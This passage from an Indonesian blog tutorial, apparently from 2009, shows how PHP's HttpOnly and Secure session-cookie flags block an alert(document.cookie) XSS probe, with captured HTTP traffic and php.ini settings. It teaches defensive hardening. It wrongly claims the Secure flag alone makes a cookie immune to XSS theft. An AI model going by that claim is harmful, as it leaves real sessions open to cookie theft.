Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Perhatikan pada baris ke-17 terlihat header:
Set-Cookie: PHPSESSID=822a078b7d3144a221174b7978866760; path=/
Artinya server meminta browser menyimpan cookie tersebut. Karena cookie tersebut tidak memiliki flag httponly atau secure, maka browser mengijinkan javascript mengaksesnya. Sehingga ketika script alert(document.cookie) dieksekusi maka dialog box alert akan muncul berisi cookie.
cookie with flag secure and httponly off
cookie with flag secure and httponly off
Kini mari kita mencoba memakai flag httpOnly. Sebelumnya script php harus saya modifikasi dahulu dengan menambahkan fungsi session_set_cookie_params sebelum fungsi session_start(). Berikut adalah script php untuk contoh ini:
1
2
3
4
5
6

session_set_cookie_params(0,"/","",false,true);
session_start();
?>
Hello World!
Fungsi session_set_cookie_params dipakai untuk mengubah parameter cookie. Parameter terakhir adalah httpOnly flag, bila diberi nilai true, maka cookie session akan memakai flag httpOnly. Mari kita coba akses dari browser dan lihat apa yang terjadi bila javascript mencoba membacanya.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
http://localhost/testhttponly/testcookie.php
 
GET /testhttponly/testcookie.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 GTB5 ImageShackToolbar/5.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
 
HTTP/1.x 200 OK
Date: Tue, 31 Mar 2009 08:50:05 GMT
Server: Apache/2.2.9 (Win32) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=f0cdcb001694502467c762204be9db58; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 54
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Perhatikan pada baris ke-17, header Set-Cookie terdapat flag HttpOnly. Dengan memberi flag tersebut server meminta browser agar tidak mengijinkan javascript mengakses cookie tersebut. Mari kita lihat apa yang terjadi bila javascript mencoba membaca cookie pada gambar di bawah ini:
cookie with httponly flag on
cookie with httponly flag on
Terlihat bahwa dialog box yang muncul tidak mengandung cookie karena document.cookie menghasilkan string kosong. Dengan cara ini walaupun ada vulnerability xss pada suatu aplikasi web, maka xss tersebut tidak dapat dieksploitasi untuk mencuri cookie.
Sebagai contoh terakhir mari kita buat cookie yang mengandung secure flag. Untuk itu script php yang saya pakai adalah:

session_set_cookie_params(0,"/","",true,false);
session_start();
?>
Hello World!
Parameter kedua dari belakang saya beri nilai true agar php memberikan flag secure pada session cookie. Mari kita lihat sniffing traffic http yang terjadi.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
http://localhost/testhttponly/testcookie.php
 
GET /testhttponly/testcookie.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.8) Gecko/2009032609 Firefox/3.0.8 GTB5 ImageShackToolbar/5.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
 
HTTP/1.x 200 OK
Date: Tue, 31 Mar 2009 09:07:49 GMT
Server: Apache/2.2.9 (Win32) DAV/2 mod_ssl/2.2.9 OpenSSL/0.9.8i mod_autoindex_color PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=90c2de0ac88e251476b3518ac92513a1; path=/; secure
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 54
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Perhatikan pada baris ke-17 terdapat header Set-Cookie yang mengandung flag secure. Request tersebut saya lakukan tidak dengan https, artinya bila browser saya refresh(reload), maka cookie yang sudah didapat dari browser tidak akan dikirimkan. Cookie tersebut baru dikirimkan ketika request dilakukan dengan https. Mari kita lihat apa yang terjadi bila javascript mencoba mengakses cookie tersebut.
cookie with secure flag on
cookie with secure flag on
Pada gambar di atas terlihat bahwa document.cookie menghasilkan string kosong sehingga alert tidak menampilkan apa-apa. Ini artinya cookie tersebut akan kebal dari pencurian dengan xss.
PHP Configuration for Session Cookie
Dalam contoh di atas saya menggunakan fungsi php untuk mengatur flag cookie. Namun sebenarnya flag cookie bisa diatur dari file konfigurasi php.ini. Parameter yang perlu diatur adalah:
  • session.cookie_httponly: isi dengan 1 bila ingin menambahkan flag httponly pada session cookie.
  • session.cookie_secure: isi dengan 1 bila ingin menambahkan flag secure pada session cookie.
Share and Enjoy:
  • Slashdot
  • StumbleUpon
  • del.icio.us
  • Digg
  • Facebook
  • MySpace
  • Technorati
  • Google Bookmarks
  • Reddit
  • Live
  • YahooMyWeb
  • Mixx